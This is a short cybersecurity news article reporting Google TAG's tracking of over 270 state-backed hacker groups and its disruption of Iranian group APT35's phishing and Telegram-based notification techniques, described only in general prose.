15 October 2021

Google says it tracks over 270 state-backed threat actors from over 50 countries


Google says it tracks over 270 state-backed threat actors from over 50 countries

The Google Threat Analysis Group (TAG) said that it is tracking more than 270 government-backed hacker groups from over 50 countries, involved in disinformation campaigns, cyber-espionage, or financially motivated cybercrime.

In a new blog post TAG’s Ajax Bash revealed that so far in 2021 the team sent over 50,000 warnings of state-sponsored phishing or malware attempts to customers. This marks a 33% increase from the same period in 2020, largely due to blocking “an unusually large campaign” from a Russia-linked threat actor known as APT28 or Fancy Bear.

One of the most notable campaigns disrupted by TAG this year was orchestrated by Iranian threat actor APT35 (aka Charming Kitten, Phosphorous, or Newscaster), known for its phishing attacks targeting high risk users.

Some previous attacks of the group involved the use of compromised websites to host a phishing kit that allowed them to collect credentials for platforms such as Gmail, Hotmail, and Yahoo, as well as a malicious VPN app uploaded to the Google Play Store that, when installed, could be leveraged to steal sensitive information such as call logs, text messages, contacts, and location data from the infected devices.

The group also adopted a novel technique that uses Telegram for operator notifications.

“The attackers embed javascript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram and they have taken action to remove it,” TAG explained.

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Bash said.


Back to the list

Latest Posts

Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

97 zero-day flaws were exploited in-the-wild in 2023, marking an increase of over 50% compared to 2022.
27 March 2024
Sophisticated malware campaign targeting end-of-life routers and IoT devices

Sophisticated malware campaign targeting end-of-life routers and IoT devices

A recent campaign targeted over 6,000 ASUS routers in less than 72 hours.
27 March 2024
Chinese APT groups target Southeast Asian nations in cyberespionage campaigns

Chinese APT groups target Southeast Asian nations in cyberespionage campaigns

The observed cyberattack employed phishing emails as the primary method of infiltration.
27 March 2024